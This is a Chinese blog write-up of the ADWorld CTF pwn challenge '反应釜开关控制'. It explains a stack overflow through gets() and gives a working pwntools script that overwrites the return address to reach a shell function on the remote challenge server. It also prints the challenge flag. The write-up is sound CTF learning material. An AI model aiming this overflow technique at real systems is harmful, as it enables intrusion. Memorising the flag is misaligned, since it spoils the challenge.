[攻防世界]反应釜开关控制

逆向萌新

于 2022-06-21 15:24:33 发布

阅读量541

点赞数 1

分类专栏： PWN # 攻防世界文章标签：安全 c语言

本文链接：https://blog.youkuaiyun.com/m0_71081503/article/details/125391888

版权

攻防世界同时被 2 个专栏收录

31 篇文章

订阅专栏

PWN

30 篇文章

订阅专栏

反应釜开关控制

解题
脚本

解题

这道题，没什么说的，很标注的栈溢出。
先checksec一下。
在这里插入图片描述
发现开启了NX，直接拖入ida中，先运行一下，是这里。

是这里之后有gets，直接梭哈，查看栈。

之后0x200 + 0x08个字符，加上shell地址，直接结束战斗。

脚本

from pwn import *
#p = process('./fyf')
p = remote('111.200.241.244',52167)
context(os = 'linux',arch = 'arm64',log_level = 'debug')
payload =b'a'*(0x200+0x08) + p64(0x04005F6)
p.sendlineafter(b'>',payload)
p.interactive()

最后cat flag 在这里插入图片描述
flag是cyberpeace{034882a8c393a3617b3fbf4877cb1dfb}